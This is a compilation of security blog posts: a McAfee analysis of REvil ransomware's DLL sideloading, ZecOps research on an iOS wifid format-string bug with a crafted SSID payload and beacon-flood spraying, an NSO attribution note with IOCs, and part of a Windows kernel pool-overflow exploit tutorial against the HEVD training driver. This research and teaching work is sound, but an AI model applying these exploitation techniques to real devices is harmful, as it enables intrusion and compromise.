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REvil Ransomware Uses DLL Sideloading

16 July 2021 at 16:49

This blog was written byVaradharajan Krishnasamy, Karthickkumar, Sakshi Jaiswal


Ransomware attacks are one of the most common cyber-attacks among organizations; due to an increase in Ransomware-as-a-service (RaaS) on the black market. RaaS provides readily available ransomware to cyber criminals and is an effective way for attackers to deploy a variety of ransomware in a short period of time.

Usually, RaaS model developers sell or rent their sophisticated ransomware framework on the black market. After purchasing the license from the ransomware developer, attackers spread the ransomware to other users, infect them, encrypt files, and demand a huge ransom payment in Bitcoin.  Also, there are discounts available on the black market for ransomware frameworks in which the ransom money paid is shared between developers and the buyer for every successful extortion of ransom from the victims. These frameworks reduce the time and effort of creating a new ransomware from scratch using latest and advanced programming languages.

REvil is one of the most famous ransomware-as-a-service (RaaS) providers. The group released the Sodinokibi ransomware in 2019, and McAfee has since observed REvil using a DLL side loading technique to execute ransomware code. The actual ransomware is a dropper that contains two embedded PE files in the resource section.  After successful execution, it drops two additional files named MsMpEng.exe and MpSvc.dll in the temp folder. The file MsMpEng.exe is a Microsoft digitally signed file having a timestamp of March 2014 (Figure 1).

Figure-1: Image of Microsoft Digitally signed File


The malware uses DLL side loading to execute the ransomware code. This technique allows the attacker to execute malicious DLLs that spoof legitimate ones. This technique has been used in many APTs to avoid detection. In this attack, MsMpEng.exe loads the functions of MpSvc.dll during the time of execution. However, the attacker has replaced the clean MpSvc.dll with the ransomware binary of the same name. The malicious DLL file has an export function named ServiceCrtMain, which is further called and executed by the Microsoft Defender file. This is a clever technique used by the attacker to execute malicious file using the Microsoft digitally signed binary.

Figure-2: Calling Export function


The ransomware uses the RC4 algorithm to decrypt the config file which has all the information that supports the encryption process.

Figure-3: REvil Config File

Then it performs a UI language check using GetSystemDefaultUILanguage/GetUserDefaultUILanguage functions and compares it with a hardcoded list which contains the language ID of several countries as shown in below image.

Figure-4: Language Check

Countries excluded from this ransomware attack are mentioned below:

GetUserDefaultUILanguage Country name
0x419 Russian
0x422 Ukranian
0x423 Belarusian
0x428 Tajik (Cyrilic from Tajikistan)
0x42B Armenian
0x42C Azerbaijani (Latin from Azerbaijan)
0x437 Georgian
0x43F Kazakh from Kazakhastan
0x440 Kyrgyzstan
0x442 Turkmenistan
0x443 Latin from Uzbekistan
0x444 Tatar from Russia Federation
0x818 Romanian from Moldova
0x819 Russian from Moldova
0x82C Cyrilic from Azerbaijan
0x843 Cyrilic from Uzbekistan
0x45A Syriac
0x281A Cyrilic from Serbia


Additionally, the ransomware checks the users keyboardlayout and it skips the ransomware infection in the machine’s which are present in the country list above.

Figure-5: Keyboardlayout check

Ransomware creates a Global mutex in the infected machine to mark its presence.

Figure-6: Global Mutex

After creating the mutex, the ransomware deletes the files in the recycle bin using the SHEmptyRecycleBinW function to make sure that no files are restored post encryption.

Figure-7: Empty Recycle Bin

Then it enumerates all the active services with the help of the EnumServicesStatusExW function and deletes services if the service name matches the list present in the config file. The image below shows the list of services checked by the ransomware.

Figure-8: Service List check

It calls the CreateToolhelp32Snapshot, Process32FirstW and Process32NextW functions to enumerate running processes and terminates those matching the list present in the config file.  The following processes will be terminated.

  • allegro
  • steam
  • xtop
  • ocssd
  • xfssvccon
  • onenote
  • isqlplussvc
  • msaccess
  • powerpnt
  • cad
  • sqbcoreservic
  • thunderbird
  • oracle
  • infopath
  • dbeng50
  • pro_comm_msg
  • agntsvc
  • thebat
  • firefox
  • ocautoupds
  • winword
  • synctime
  • tbirdconfig
  • mspub
  • visio
  • sql
  • ocomm
  • orcad
  • mydesktopserv
  • dbsnmp
  • outlook
  • cadence
  • excel
  • wordpad
  • creoagent
  • encsvc
  • mydesktopqos


Then, it encrypts files using the Salsa20 algorithm and uses multithreading for fast encryption of the files. Later, background wallpaper will be set with a ransom message.

Figure-9: Desktop Wallpaper

Finally, the ransomware displays ransom notes in the victim’s machine. Below is an image of readme.txt which is dropped in the infected machine.

Figure-10: Ransom Note

IOCs and Coverage

Type Value Detection Name Detection Package Version (V3)
Loader 5a97a50e45e64db41049fd88a75f2dd2 REvil.f 4493
Dropped DLL 78066a1c4e075941272a86d4a8e49471 REvil.e 4493


Expert rules allow McAfee customers to extend their coverage. This rule covers this REvil ransomware behaviour.


Technique ID Tactic Technique Details
T1059.003 Execution Command and Scripting Interpreter
T1574.002 DLL Side-Loading Hijack Execution Flow
T1486 Impact Data Encrypted for Impact
T1036.005 Defense Evasion Masquerading
T1057 Discovery Process Discovery
T1082 Discovery System Information Discovery


McAfee observed that the REvil group has utilized oracle web logic vulnerability (CVE-2019-2725) to spread the ransomware last year and used kaseya’s VSA application recently for their ransomware execution, with the help of DLL sideloading. REvil uses many vulnerability applications for ransomware infections, however the encryption technique remains the same. McAfee recommends making periodic backups of files and keeping them isolated off the network and having an always updated antivirus in place.

The post REvil Ransomware Uses DLL Sideloading appeared first on McAfee Blog.

Meet WiFiDemon – iOS WiFi RCE 0-Day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched

17 July 2021 at 13:30
Meet WiFiDemon – iOS WiFi RCE 0-Day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched

The TL;DR Version:

ZecOps Mobile EDR Research team investigated if the recently announced WiFi format-string bug in wifid was exploited in the wild. 

This research led us to interesting discoveries:

  • Recently a silently patched 0-click WiFi proximity vulnerability on iOS 14 – iOS 14.4 without any assigned CVE
  • That the publicly announced WiFi Denial of Service (DoS) bug, which is currently a 0day, is more than just a DoS and actually a RCE!
  • Analysis if any of the two bugs were exploited across our cloud user-base.


There’s a new WiFi vulnerability in-town. You probably already saw it, but didn’t realize the implication. The recently disclosed ‘non-dangerous’ WiFi bug – is potent.

This vulnerability allows an attacker to infect a phone/tablet without *any* interaction with an attacker. This type of attack is known as “0-click” (or “zero-click”). The vulnerability was only partially patched.

1. Prerequisites to the WiFiDemon 0-Click Attack:

  • Requires the WiFi to be open with Auto-Join (enabled by default)
  • Vulnerable iOS Version for 0-click: Since iOS 14.0
  • The 0-Click vulnerability was patched on iOS 14.4


  • Update to the latest version, 14.6 at the time of writing to avoid risk of WiFiDemon in its 0-click form. 
  • Consider disabling WiFi Auto-Join Feature via Settings->WiFi->Auto-Join Hotspot->Never.
  • Perform risk and compromise assessment to your mobile/tablet security using ZecOps Mobile EDR in case you suspect that you were targeted.

2. Prerequisites to the WiFi 0Day Format Strings Attack:

Unlike initial research publications, at the time of writing, the WiFi Format Strings seem to be a Remote Code Execution (RCE) when joining a malicious SSID. 


  • Do not join unknown WiFis.
  • Consider disabling WiFi Auto-Join Feature via Settings->WiFi->Auto-Join Hotspot->Never.
  • Perform risk and compromise assessment to your mobile/tablet security using ZecOps Mobile EDR in case you suspect that you were targeted.
  • This vulnerability is still a 0day at the time of writing, July 4th. iOS 14.6 is VULNERABLE when connecting to a specially crafted SSID. 
  • Wait for an official update by Apple and apply it as soon as possible.

Wi-Fi-Demon ?

wifid is a system daemon that handles protocol associated with WIFI connection. Wifid runs as root. Most of the handling functions are defined in the CoreWiFi framework, and these services are not accessible from within the sandbox. wifid is a sensitive daemon that may lead to whole system compromise.

Lately, researcher Carl Schou (@vm_call) discovered that wifid has a format string problem when handling SSID.

The original tweet suggests that this wifid bug could permanently disable iPhone’s WiFi functionality, as well as the Hotspot feature. This “WiFi” Denial of Service (DoS) is happening since wifid writes known wifi SSID into the following three files on the disk:

  • /var/preferences/
  • /var/preferences/SystemConfiguration/
  • /var/preferences/SystemConfiguration/

Every time that wifid respawns, it reads the bad SSID from a file and crashes again. Even a reboot cannot fix this issue.

However, this bug can be “fixed” by taking the following steps according to Forbes:

“The fix is simple: Simply reset your network settings by going to Settings > General > Reset > Reset Network Settings.”

This bug currently affects the latest iOS 14.6, and Apple has not yet released any fixes for this bug.

Further Analysis Claims: This is Only a Denial of Service

Followed by another researcher Zhi @CodeColorist published a quick analysis.

His conclusion was:

“For the exploitability, it doesn’t echo and the rest of the parameters don’t seem like to be controllable. Thus I don’t think this case is exploitable.

After all, to trigger this bug, you need to connect to that WiFi, where the SSID is visible to the victim. A phishing Wi-Fi portal page might as well be more effective.”

The Plot Thickens

We checked ZecOps Mobile Threat Intelligence to see if this bug was exploited in the past. We noticed that two of our EMEA users had an event related to this bug. Noteworthy, we only have access to our cloud data, and couldn’t check other on-premises clients – so we might be missing other events.

We asked ourselves: 

  1. Why would a person aware of dangerous threats connect to a network with such an odd name “%s%s…”. – Unlikely.
  2. Why would an attacker bring a tactical team to target a VIP, only to cause DoS – It still does not make sense.

Remotely exploitable, 0-click, under the hood!

Further analysis revealed that:

  1. Attackers did not need to force the user to connect. This vulnerability could be launched as a 0click, without any user interaction. A victim only needed to have your WiFi turned on to trigger the vulnerable code.
  2. This is not a DoS, but an actual RCE vulnerability for both the recently patched 0-click format-strings vulnerability, and the malicious SSID format-strings 0-day vulnerability.

This 0-click bug was patched on iOS 14.4 and credits “an anonymous researcher” for assisting. Although this is a potent 0-click bug, a CVE was not assigned.

Technical Details: Analysis of a Zero-Click WiFi Vulnerability – WiFiDemon

Let’s do a deeper dive into the technical details behind this vulnerability:

Considering the possible impact of triggering this vulnerability as a 0-click, as well as the potential RCE implications, we investigated the wifid vulnerability in depth.

When we tested this format-strings bug on an older version, similar to our clients, we noticed that wifid has intriguing logs when it is not connected to any wifi.

These logs contain SSID, which indicates that it may be affected by the same format string bug. 

We tested it and Voilà, it is affected by the same format string bug – meaning that this is a zero-click vulnerability and can be triggered without an end-user connecting to a strange named wifi.

This log is related to a common smart device behavior: Automatically scan and join known networks.

Zero-Click – Even When The Screen is Off

The iPhone scans WiFi to join every ~3 seconds while the user is actively using the phone. Furthermore, even if the user’s phone screen has been turned off, it still scans for WiFi but at a relatively lower frequency. The waiting time for the following scan will be longer and longer, from ~10 seconds to 1+ minute

As long as the WiFi is turned on this vulnerability can be triggered. If the user is connected to an existing WiFi network, an attacker can launch another attack to disconnect/de-associate the device and then launch this 0-click attack. Disconnecting a device from a WiFi is well-documented and we’ll not cover it as part of the scope for this blog.

This 0-click vulnerability is powerful: if the malicious access point has password protection and the user never joins the wifi, nothing will be saved to the disk. After turning off the malicious access point, the user’s WIFI function will be normal. A user could hardly notice if they have been attacked.

Exploiting this Vulnerability

We further analyzed whether this vulnerability can be exploited, and how:

This post assumes that the reader is aware of the concept of format-string bugs and how to exploit them. However, this bug is slightly different from the “traditional” printf format string bugs because it uses [NSString stringWithFormat:] which was implemented by Apple, and Apple removed the support for %n for security reasons. That’s how an attacker would have been able to write to the memory in an exploitation of a traditional format string bug.

Where You AT? – %@ Is Handy!

Since we cannot use %n, we looked for another way to exploit this 0-click N-Day, as well as the 1-click 0-day wifid bug. Another possible use is %@, which is uniquely used by Objective-C.

Since the SSID length is limited to 32 bytes, we can only put up to 16 Escape characters in a single SSID. Then the Escape characters we placed will process the corresponding data on the stack.

A potential exploit opportunity is if we can find an object that has been released on the stack, in that case, we can find a spray method to control the content of that memory and then use %@ to treat it as an Objective-C object, like a typical Use-After-Free that could lead to code execution.

Step 1: Find Possible Spraying Opportunities on the Stack

First, we need to design an automatic method to detect whether it is possible to tweak the data on the stack. lldb breakpoint handling script perfectly fits that purpose. Set a breakpoint right before the format string bug and link to a lldb script that will automatically scan and observe changes in the stack.

Step 2: Find an Efficient Spraying Method

Then we need a spray method that can interfere with wifid’s memory over the air. 

An interesting strategy is called Beacon Flooding Attack. It broadcasts countless Beacon frames and results in many access points appearing on the victim’s device.

To perform a beacon flooding attack, you need a wireless Dongle that costs around $10 and a Linux VM. Install the corresponding dongle firmware and a tool called mdk3. For details, please refer to this article.

As part of the beacon frame mandatory field, SSID can store a string of up to 32 bytes. wifid assigns a string object for each detected SSID. You can observe that from the log. This is the most obvious thing we can use for spray.

Now attach a debugger to wifid and start flooding the device with a list of SSIDs that can be easily recognized. Turn on the iOS wifi feature and wait until it begins automatically scanning for available WiFi. The breakpoint will get triggered and check through the stack to find traces of spray. Below is the output of the lldb script:

The thing that caught our eye is the pointer stored at stack + offset 0x18. Since the SSID can store up to 32 bytes, the shortest format string escape character such as %x will occupy two bytes, which means that we can reach the range of 16 pointers stored on the stack with a single SSID at most. So stack + offset 0x18 could be reached by the fourth escape character. And the test results tell us that data at this offset could be controlled by the content we spray.

Step 3 – Test the Ability to Remotely Control the Code Execution Flow

So in the next test, we kept the Beacon Flooding Attack running, meanwhile we built a hotspot named “DDDD%x%x%x%@”. Notice that %@ is the fourth escape character. Unsurprisingly, wifid crashes as soon as it reads the name, and it automatically respawns and crashes again as long as the hotspot is still on.

Checking the crash, it appears that the x15 register is easily affected.

Now analyze where it crashed. As the effect of %@ format specifier, it’s trying to print Objective-C Object.

The code block highlighted in yellow is the desired code execution flow. x0 is the pointer stored at stack + offset 0x18. We try to control its content through the spray and lead the situation to the typical Use-After-Free scenario. x9 is the data x0 points to. It represents isa pointer, which is the first member of the objc object data structure. As you can see in the figure, control x9 is critical to reaching that objc_msgSend call at the bottom. With more tests, we confirmed that stack + offset 0x18 indeed can be affected by the spray.

Now things have become more familiar. Pass a controlled/fake Objc object to objc_msgSend to achieve arbitrary code execution. The next challenge is finding a way to spray memory filled with ROP/JOP payload.

Step 4 – Achieving Remote Code Execution

wifid deals with a lot of wireless features. Spraying large memory wirelessly is left as an exercise for the reader. Locally, this bug can be used to build a partial sandbox escape to help achieve jailbreaking.


Ironically, the events that triggered our interest in this vulnerability were not related to an attack and the two devices were only subject to a denial of service issue that was fixed on iOS 14.6.

However, since this vulnerability was widely published, and relatively easy to notice, we are highly confident that various threat actors have discovered the same information we did, and we would like to encourage an issuance of a patch as soon as possible.

ZecOps Mobile EDR Customers will identify attacks leveraging these vulnerabilities with the tag “WiFiDemon”.

Generating an Alert Using ZecOps Mobile EDR

We have added generic rules for detection of successful exploitation to our customers.

We also provided instructions to customers on how to create a rule to see failed spraying / ASLR bypass attempts.

To summarize:

  • A related vulnerability was exploitable as a 0-click until iOS 14.4. CVE was not assigned and the vulnerability was silently patched. The patch thanks an anonymous researcher.
  • The publicly announced WiFi vulnerability is exploitable on 14.6 when connecting a maliciously crafted SSID.
  • We highly recommend issuing a patch for this vulnerability.
  • Older devices: e.g. iPhone 5s are still on iOS 12.X which is not vulnerable to the 0-click vulnerability.

If you’d like to check your phone and monitor it – feel free to reach out to us here to discuss how we can help you increase your mobile visibility using ZecOps Mobile EDR.

We would like to thank @08tc3wbb (follow), @ihackbanme (follow) and SYMaster for assisting with this blog.

iOS 14.7 fix

The fix on iOS 14.7 is as follows, it’s pretty straightforward, adding “%s” as format-string and the SSID included string as a parameter solves the issue.

Threat Actors are Working Together. Defenders Should Collaborate Too!

17 July 2021 at 20:14
Threat Actors are Working Together. Defenders Should Collaborate Too!

We previously published that we suspected that there were more than one threat actor targeting the Al-Jazeera journalists.


ZecOps discovered NSO attacks that targeted Al-Jazeera automatically using ZecOps Mobile EDR & DFIR solutions. Our initial analysis suggested that the footprint does not belong only to NSO.

ZecOps Mobile Threat Intelligence Brief

ZecOps can now confirm, with high-confidence, that the attacks targeting journalists in Middle East were caused by at least two commercial threat actors working together, and the attack launched by a nation-state that purchased NSO’s exploit-platform. 

This may sound like a minor detail, but every detail in attribution is crucial.


In the last transparency report by NSO, they published that they limit the usage.

NSO published limit

This can be translated into “We have a license based attack-as-a-service model. We only sell a certain amount of attack licenses to a certain buyer.”. While this intelligence is not fully confirmed, and should be taken with a grain of salt, our intelligence also suggests that “Desert Cobra” (state actor) purchased an ‘unlimited number of licenses’ package to carry out attacks using NSO’s software.

NSO acquired exploits from another supplier and leveraged the borrowed exploit in the attack launched by the end-buyer (Desert Cobrat) against Al-Jazeera journalists. It is unclear if the  end-customer, a government, was aware that parts of the exploit chain were obtained from another threat-actor and sold as a package.

Bottom line

As threat actors working together, defenders should be working together too. We hope that the vendors reading this will enable SOCs around the world with better access in-order to find and capture payloads by threat actors like NSO, that will always find a way, or as we can see in this post “buy their way”, to bypass all the existing mitigations and security controls.

ZecOps Mobile EDR Customers: no further action is required. ZecOps discovered the Al-Jazeera attack, and other NSO related incidents automatically. The deployed systems detect these activities. The complete report and full IOC list is available in ZecOps Mobile Threat Intelligence feed.

Al Jazeera NSO Attack IOCs:

  • /private/var/tmp/uevkjdwxijvah/c
  • /private/var/db/
  • /private/var/db/
  • /private/var/db/

Unfortunately, due to iOS sandbox restrictions, it is not trivial to check for these IOCs. If you would like to check your phone for these IOCs, other attacks by NSO, or other threat actors, please feel free to contact us here.

Free Mobile Inspection

To help discover these attacks, for a limited time, ZecOps is offering free mobile inspections to businesses that were targeted in the NSO leak. For your instant inspection, fill out the form below.

We got your request.
Please make sure that you have filled in all the fields.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

18 July 2021 at 00:00


This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining this information leak vulnerability with the bug outlined in this post, which is a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why pool corruption in the age of the segment heap has had the scope of techniques, in my estimation, lessened from the days of Windows 7.

Due to the release of Windows 11 recently, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise - vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code to either data-only style attacks or to investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a processor directive to make this variable 16 on a Windows 64-bit machine, which we are testing from. We now know that the pool chunk that will be allocated from the call to ExAllocatePoolWithTag within TriggerBufferOverfloowNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack on the pool overflow code to the end, after the for loop which does parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL for to reach the TriggerBufferOverflowNonPagedPool function is 0x0022204b

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have subsequently corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on on call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again incurs. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question is now, with a kASLR bypass in hand - how to we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap it to find objects, when exploiting the kLFH specifically, that are of the same size as the vulnerable object, contain an interesting member in the object, can be called from user mode, and are allocated on the same pool type as the vulnerable object. We can recall earlier that the size of the vulnerable object was 16 bytes in size. The goal here now is to look at the source code of the driver to determine if there isn’t a useful object that we can allocate which will meet all of the specified parameters above. Note again, this is the toughest part about pool exploitation is finding objects worthwhile.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h, which are useful to us. As the name can specify, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver and look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects on the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELP_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelpeNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the defined functions in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELP_OBJECT_IO and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer, ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation, via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperOjbectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and managed such objects. This is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWIthTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we instantiated the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER_ structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, there is always a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT created. We know there is also an array of these objects created and the created object for each given CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        // Get a free index

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
            // Failed to get a free index

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

